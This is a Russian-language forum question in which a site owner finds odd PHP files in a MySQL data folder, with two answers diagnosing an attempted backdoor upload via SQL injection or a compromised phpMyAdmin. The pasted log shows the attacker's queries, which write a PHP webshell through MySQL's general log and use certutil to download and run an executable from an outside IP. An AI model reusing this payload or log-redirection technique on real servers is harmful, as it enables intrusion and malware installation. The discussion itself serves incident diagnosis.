Задать вопрос
@Snewer
mysql

Откуда взялись подозрительные файлы в папке данных mysql?

Здравствуйте!

Заметил в папке с данными MySQL подозрительные PHP файлы:

auto.cnf
ca-key.pem
ca.pem
C:AppServwwwindex.php
client-cert.pem
client-key.pem
C:phpStudyPHPTutorialWWWindex.php
C:phpStudyWWWindex.php
C:PHPTutorialWWWindex.php
C:xampphtdocsindex.php
D:phpStudyPHPTutorialWWWindex.php
D:phpStudyWWWindex.php
D:PHPTutorialWWWindex.php
E:phpStudyPHPTutorialWWWindex.php
E:phpStudyWWWindex.php
E:PHPTutorialWWWindex.php
ib_buffer_pool
ibdata1
ib_logfile0
ib_logfile1
ibtmp1
mysql
performance_schema
private_key.pem
public_key.pem
server-cert.pem
server-key.pem
sys

Пример содержимого:
2018-12-23T08:01:47.597864Z     11192 Query     SELECT '<?php @system("certutil.exe -urlcache -split -f http://23.94.62.127/wkinstall.exe &wkinstall.exe &del wkinstall.exe'
2018-12-23T08:01:47.799769Z     11192 Query     set global general_log='on'
2018-12-23T08:01:47.985474Z     11192 Query     SET global general_log_file='C:\xampp\htdocs\index.php'


Что можете сказать по этому поводу? Спасибо.
  • Вопрос задан
  • 276 просмотров
1 комментарий
Подписаться 2 Средний 1 комментарий
Пригласить эксперта
Ответы на вопрос 2
vesper-bot
@vesper-bot
Любитель файрволлов
У тебя в веб-сайте есть некий элемент, позволяющий залить файлы, его попытались ломануть, заливая шелл или бэкдор, а путь, куда заливать, не смогли нормально подобрать (либо какой-то из каталогов, открытый на запись, в настройках веб-сервера указывает на каталог базы данных, скорее всего и то и другое). Тебя спасло то, что сервер у тебя на линуксе, а атакующий пытался ломануть винды. Возможно, тебе взломали phpmyadmin-компонент (подобрали пароль, например). В общем жопа сайту, перезалей контент, обнови движок и забэкапь базу, и внимательно смотри конфиг веб-сервера, чтобы не было в нем посторонних каталогов, которые в принципе не должны светиться наружу.
Ответ написан
1 комментарий
1 комментарий
@BorisKorobkov Куратор тега MySQL
Web developer
На вашем сайте есть SQL-инъекция. Полный доступ к БД атакующие уже получили, сейчас пытаются залить бэкдор.
Ответ написан
2 комментария
2 комментария
Ваш ответ на вопрос

Войдите, чтобы написать ответ

Похожие вопросы
Вакансии с Хабр Карьеры
WordPress-разработчик
div. Ставрополь
от 50 000 до 120 000 ₽
PHP Backend developer
Wanted. Москва
До 200 000 ₽
Senior PHP Программист
Автомакон
от 287 000 до 440 000 ₽
Ещё вакансии
Заказы с Хабр Фриланса
Разработать индикатор для торговой платформы Metatreder5
22 нояб. 2024, в 15:00
2500 руб./в час
Разработка базы данных на SQL
22 нояб. 2024, в 14:51
10000 руб./за проект
Разработка API на Go+ClickHouse
22 нояб. 2024, в 14:51
2000 руб./в час
Ещё заказы